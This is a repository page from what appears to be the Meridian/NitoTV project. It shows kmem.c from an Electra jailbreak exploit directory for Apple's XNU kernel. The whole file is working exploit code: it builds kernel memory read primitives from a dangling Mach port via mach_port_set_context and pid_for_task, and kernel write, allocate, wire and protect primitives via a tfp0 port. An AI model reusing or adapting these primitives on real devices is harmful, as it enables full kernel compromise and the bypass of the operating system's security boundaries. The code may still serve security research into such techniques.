首頁 探索 說明
登入
NitoTV
/
merdian
關註 3
讚好 0
複刻 0
檔案 問題管理 0 合併請求 1 Wiki
分支: master
分支列表 標籤列表
merdian
/
Meridian
/
meridianTV
/
electra
/
exploit
/
kmem.c

kmem.c 8.3 KB
永久連結 文件歷史 原始文件

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309 
  1. #include <stdio.h>
    2. 

  2. #include <stdlib.h>
    3. 

  3. #include <unistd.h>
    4. 

  4. 

  5. #include <mach/mach.h>
    6. 

  6. 

  7. #include "kmem.h"
    8. 

  8. #include "kutils.h"
    9. 

  9. 

  10. /***** mach_vm.h *****/
    11. 

  11. kern_return_t mach_vm_read(
    12. 

  12.   vm_map_t target_task,
    13. 

  13.   mach_vm_address_t address,
    14. 

  14.   mach_vm_size_t size,
    15. 

  15.   vm_offset_t *data,
    16. 

  16.   mach_msg_type_number_t *dataCnt);
    17. 

  17. 

  18. kern_return_t mach_vm_write(
    19. 

  19.   vm_map_t target_task,
    20. 

  20.   mach_vm_address_t address,
    21. 

  21.   vm_offset_t data,
    22. 

  22.   mach_msg_type_number_t dataCnt);
    23. 

  23. 

  24. kern_return_t mach_vm_read_overwrite(
    25. 

  25.   vm_map_t target_task,
    26. 

  26.   mach_vm_address_t address,
    27. 

  27.   mach_vm_size_t size,
    28. 

  28.   mach_vm_address_t data,
    29. 

  29.   mach_vm_size_t *outsize);
    30. 

  30. 

  31. kern_return_t mach_vm_allocate(
    32. 

  32.   vm_map_t target,
    33. 

  33.   mach_vm_address_t *address,
    34. 

  34.   mach_vm_size_t size,
    35. 

  35.   int flags);
    36. 

  36. 

  37. kern_return_t mach_vm_deallocate (
    38. 

  38.   vm_map_t target,
    39. 

  39.   mach_vm_address_t address,
    40. 

  40.   mach_vm_size_t size);
    41. 

  41. 

  42. kern_return_t mach_vm_protect (
    43. 

  43.   vm_map_t target_task,
    44. 

  44.   mach_vm_address_t address,
    45. 

  45.   mach_vm_size_t size,
    46. 

  46.   boolean_t set_maximum,
    47. 

  47.   vm_prot_t new_protection);
    48. 

  48. 

  49. // the exploit bootstraps the full kernel memory read/write with a fake
    50. 

  50. // task which just allows reading via the bsd_info->pid trick
    51. 

  51. // this first port is kmem_read_port
    52. 

  52. mach_port_t kmem_read_port = MACH_PORT_NULL;
    53. 

  53. void prepare_rk_via_kmem_read_port(mach_port_t port) {
    54. 

  54.   kmem_read_port = port;
    55. 

  55. }
    56. 

  56. 

  57. mach_port_t tfp1 = MACH_PORT_NULL;
    58. 

  58. void prepare_rwk_via_tfp0(mach_port_t port) {
    59. 

  59.   tfp1 = port;
    60. 

  60. }
    61. 

  61. 

  62. int have_kmem_read() {
    63. 

  63.   return (kmem_read_port != MACH_PORT_NULL) || (tfp1 != MACH_PORT_NULL);
    64. 

  64. }
    65. 

  65. 

  66. int have_kmem_write() {
    67. 

  67.   return (tfp1 != MACH_PORT_NULL);
    68. 

  68. }
    69. 

  69. 

  70. uint32_t rk32_via_kmem_read_port(uint64_t kaddr) {
    71. 

  71.   kern_return_t err;
    72. 

  72.   if (kmem_read_port == MACH_PORT_NULL) {
    73. 

  73.     printf("kmem_read_port not set, have you called prepare_rk?\n");
    74. 

  74.     sleep(10);
    75. 

  75.     exit(EXIT_FAILURE);
    76. 

  76.   }
    77. 

  77.   
    78. 

  78.   mach_port_context_t context = (mach_port_context_t)kaddr - 0x10;
    79. 

  79.   err = mach_port_set_context(mach_task_self(), kmem_read_port, context);
    80. 

  80.   if (err != KERN_SUCCESS) {
    81. 

  81.     printf("error setting context off of dangling port: %x %s\n", err, mach_error_string(err));
    82. 

  82.     sleep(10);
    83. 

  83.     exit(EXIT_FAILURE);
    84. 

  84.   }
    85. 

  85.   
    86. 

  86.   // now do the read:
    87. 

  87.   uint32_t val = 0;
    88. 

  88.   err = pid_for_task(kmem_read_port, (int*)&val);
    89. 

  89.   if (err != KERN_SUCCESS) {
    90. 

  90.     printf("error calling pid_for_task %x %s", err, mach_error_string(err));
    91. 

  91.     sleep(10);
    92. 

  92.     exit(EXIT_FAILURE);
    93. 

  93.   }
    94. 

  94.   
    95. 

  95.   return val;
    96. 

  96. }
    97. 

  97. 

  98. uint32_t rk32_via_tfp0(uint64_t kaddr) {
    99. 

  99.   kern_return_t err;
    100. 

  100.   uint32_t val = 0;
    101. 

  101.   mach_vm_size_t outsize = 0;
    102. 

  102. 	
    103. 

  103.   err = mach_vm_read_overwrite(tfp1,
    104. 

  104.                                (mach_vm_address_t)kaddr,
    105. 

  105.                                (mach_vm_size_t)sizeof(uint32_t),
    106. 

  106.                                (mach_vm_address_t)&val,
    107. 

  107.                                &outsize);
    108. 

  108.   if (err != KERN_SUCCESS){
    109. 

  109.     printf("tfp0 read failed %s addr: 0x%llx err:%x port:%x\n", mach_error_string(err), kaddr, err, tfp1);
    110. 

  110.     sleep(3);
    111. 

  111.     return 0;
    112. 

  112.   }
    113. 

  113.   
    114. 

  114.   if (outsize != sizeof(uint32_t)){
    115. 

  115.     printf("tfp0 read was short (expected %lx, got %llx\n", sizeof(uint32_t), outsize);
    116. 

  116.     sleep(3);
    117. 

  117.     return 0;
    118. 

  118.   }
    119. 

  119.   return val;
    120. 

  120. }
    121. 

  121. 

  122. uint32_t rk32_electra(uint64_t kaddr) {
    123. 

  123.   if (tfp1 != MACH_PORT_NULL) {
    124. 

  124.     return rk32_via_tfp0(kaddr);
    125. 

  125.   }
    126. 

  126.   
    127. 

  127.   if (kmem_read_port != MACH_PORT_NULL) {
    128. 

  128.     return rk32_via_kmem_read_port(kaddr);
    129. 

  129.   }
    130. 

  130.   
    131. 

  131.   printf("attempt to read kernel memory but no kernel memory read primitives available\n");
    132. 

  132.   sleep(3);
    133. 

  133.   
    134. 

  134.   return 0;
    135. 

  135. }
    136. 

  136. 

  137. uint64_t rk64_electra(uint64_t kaddr) {
    138. 

  138.   uint64_t lower = rk32_electra(kaddr);
    139. 

  139.   uint64_t higher = rk32_electra(kaddr+4);
    140. 

  140.   uint64_t full = ((higher<<32) | lower);
    141. 

  141.   return full;
    142. 

  142. }
    143. 

  143. 

  144. void wkbuffer(uint64_t kaddr, void* buffer, uint32_t length) {
    145. 

  145.   if (tfp1 == MACH_PORT_NULL) {
    146. 

  146.     printf("attempt to write to kernel memory before any kernel memory write primitives available\n");
    147. 

  147.     sleep(3);
    148. 

  148.     return;
    149. 

  149.   }
    150. 

  150.   
    151. 

  151.   kern_return_t err;
    152. 

  152.   err = mach_vm_write(tfp1,
    153. 

  153.                       (mach_vm_address_t)kaddr,
    154. 

  154.                       (vm_offset_t)buffer,
    155. 

  155.                       (mach_msg_type_number_t)length);
    156. 

  156.   
    157. 

  157.   if (err != KERN_SUCCESS) {
    158. 

  158.     printf("tfp0 write failed: %s %x\n", mach_error_string(err), err);
    159. 

  159.     return;
    160. 

  160.   }
    161. 

  161. }
    162. 

  162. 

  163. void rkbuffer(uint64_t kaddr, void* buffer, uint32_t length) {
    164. 

  164.   kern_return_t err;
    165. 

  165.   mach_vm_size_t outsize = 0;
    166. 

  166.   err = mach_vm_read_overwrite(tfp1,
    167. 

  167.                                (mach_vm_address_t)kaddr,
    168. 

  168.                                (mach_vm_size_t)length,
    169. 

  169.                                (mach_vm_address_t)buffer,
    170. 

  170.                                &outsize);
    171. 

  171.   if (err != KERN_SUCCESS){
    172. 

  172.     printf("tfp0 read failed %s addr: 0x%llx err:%x port:%x\n", mach_error_string(err), kaddr, err, tfp1);
    173. 

  173.     sleep(3);
    174. 

  174.     return;
    175. 

  175.   }
    176. 

  176.   
    177. 

  177.   if (outsize != length){
    178. 

  178.     printf("tfp0 read was short (expected %lx, got %llx\n", sizeof(uint32_t), outsize);
    179. 

  179.     sleep(3);
    180. 

  180.     return;
    181. 

  181.   }
    182. 

  182. }
    183. 

  183. 

  184. const uint64_t kernel_address_space_base = 0xffff000000000000;
    185. 

  185. void kmemcpy(uint64_t dest, uint64_t src, uint32_t length) {
    186. 

  186.   if (dest >= kernel_address_space_base) {
    187. 

  187.     // copy to kernel:
    188. 

  188.     wkbuffer(dest, (void*) src, length);
    189. 

  189.   } else {
    190. 

  190.     // copy from kernel
    191. 

  191.     rkbuffer(src, (void*)dest, length);
    192. 

  192.   }
    193. 

  193. }
    194. 

  194. 

  195. void wk32_electra(uint64_t kaddr, uint32_t val) {
    196. 

  196.   if (tfp1 == MACH_PORT_NULL) {
    197. 

  197.     printf("attempt to write to kernel memory before any kernel memory write primitives available\n");
    198. 

  198.     sleep(3);
    199. 

  199.     return;
    200. 

  200.   }
    201. 

  201.   
    202. 

  202.   kern_return_t err;
    203. 

  203.   err = mach_vm_write(tfp1,
    204. 

  204.                       (mach_vm_address_t)kaddr,
    205. 

  205.                       (vm_offset_t)&val,
    206. 

  206.                       (mach_msg_type_number_t)sizeof(uint32_t));
    207. 

  207.   
    208. 

  208.   if (err != KERN_SUCCESS) {
    209. 

  209.     printf("tfp0 write failed: %s %x\n", mach_error_string(err), err);
    210. 

  210.     return;
    211. 

  211.   }
    212. 

  212. }
    213. 

  213. 

  214. void wk64_electra(uint64_t kaddr, uint64_t val) {
    215. 

  215.   uint32_t lower = (uint32_t)(val & 0xffffffff);
    216. 

  216.   uint32_t higher = (uint32_t)(val >> 32);
    217. 

  217.   wk32_electra(kaddr, lower);
    218. 

  218.   wk32_electra(kaddr+4, higher);
    219. 

  219. }
    220. 

  220. 

  221. uint64_t kmem_alloc(uint64_t size) {
    222. 

  222.   if (tfp1 == MACH_PORT_NULL) {
    223. 

  223.     printf("attempt to allocate kernel memory before any kernel memory write primitives available\n");
    224. 

  224.     sleep(3);
    225. 

  225.     return 0;
    226. 

  226.   }
    227. 

  227.   
    228. 

  228.   kern_return_t err;
    229. 

  229.   mach_vm_address_t addr = 0;
    230. 

  230.   mach_vm_size_t ksize = round_page_kernel(size);
    231. 

  231.   err = mach_vm_allocate(tfp1, &addr, ksize, VM_FLAGS_ANYWHERE);
    232. 

  232.   if (err != KERN_SUCCESS) {
    233. 

  233.     printf("unable to allocate kernel memory via tfp0: %s %x\n", mach_error_string(err), err);
    234. 

  234.     sleep(3);
    235. 

  235.     return 0;
    236. 

  236.   }
    237. 

  237.   return addr;
    238. 

  238. }
    239. 

  239. 

  240. uint64_t kmem_alloc_wired(uint64_t size) {
    241. 

  241.   if (tfp1 == MACH_PORT_NULL) {
    242. 

  242.     printf("attempt to allocate kernel memory before any kernel memory write primitives available\n");
    243. 

  243.     sleep(3);
    244. 

  244.     return 0;
    245. 

  245.   }
    246. 

  246.   
    247. 

  247.   kern_return_t err;
    248. 

  248.   mach_vm_address_t addr = 0;
    249. 

  249.   mach_vm_size_t ksize = round_page_kernel(size);
    250. 

  250.   
    251. 

  251.   printf("vm_kernel_page_size: %lx\n", vm_kernel_page_size);
    252. 

  252. 

  253.   err = mach_vm_allocate(tfp1, &addr, ksize+0x4000, VM_FLAGS_ANYWHERE);
    254. 

  254.   if (err != KERN_SUCCESS) {
    255. 

  255.     printf("unable to allocate kernel memory via tfp0: %s %x\n", mach_error_string(err), err);
    256. 

  256.     sleep(3);
    257. 

  257.     return 0;
    258. 

  258.   }
    259. 

  259.   
    260. 

  260.   printf("allocated address: %llx\n", addr);
    261. 

  261.   
    262. 

  262.   addr += 0x3fff;
    263. 

  263.   addr &= ~0x3fffull;
    264. 

  264.   
    265. 

  265.   printf("address to wire: %llx\n", addr);
    266. 

  266.   
    267. 

  267.   err = mach_vm_wire(fake_host_priv(), tfp1, addr, ksize, VM_PROT_READ|VM_PROT_WRITE);
    268. 

  268.   if (err != KERN_SUCCESS) {
    269. 

  269.     printf("unable to wire kernel memory via tfp0: %s %x\n", mach_error_string(err), err);
    270. 

  270.     sleep(3);
    271. 

  271.     return 0;
    272. 

  272.   }
    273. 

  273.   return addr;
    274. 

  274. }
    275. 

  275. 

  276. void kmem_free(uint64_t kaddr, uint64_t size) {
    277. 

  277. #if 0
    278. 

  278.   if (tfp1 == MACH_PORT_NULL) {
    279. 

  279.     printf("attempt to deallocate kernel memory before any kernel memory write primitives available\n");
    280. 

  280.     sleep(3);
    281. 

  281.     return;
    282. 

  282.   }
    283. 

  283.   
    284. 

  284.   kern_return_t err;
    285. 

  285.   mach_vm_size_t ksize = round_page_kernel(size);
    286. 

  286.   err = mach_vm_deallocate(tfp1, kaddr, ksize);
    287. 

  287.   if (err != KERN_SUCCESS) {
    288. 

  288.     printf("unable to deallocate kernel memory via tfp0: %s %x\n", mach_error_string(err), err);
    289. 

  289.     sleep(3);
    290. 

  290.     return;
    291. 

  291.   }
    292. 

  292. }
    293. 

  293. 

  294. void kmem_protect(uint64_t kaddr, uint32_t size, int prot) {
    295. 

  295.   if (tfp1 == MACH_PORT_NULL) {
    296. 

  296.     printf("attempt to change protection of kernel memory before any kernel memory write primitives available\n");
    297. 

  297.     sleep(3);
    298. 

  298.     return;
    299. 

  299.   }
    300. 

  300.   kern_return_t err;
    301. 

  301.   err = mach_vm_protect(tfp1, (mach_vm_address_t)kaddr, (mach_vm_size_t)size, 0, (vm_prot_t)prot);
    302. 

  302.   if (err != KERN_SUCCESS) {
    303. 

  303.     printf("unable to change protection of kernel memory via tfp0: %s %x\n", mach_error_string(err), err);
    304. 

  304.     sleep(3);
    305. 

  305.     return;
    306. 

  306.   }
    307. 

  307. #endif
    308. 

  308. }
    309. 

  309.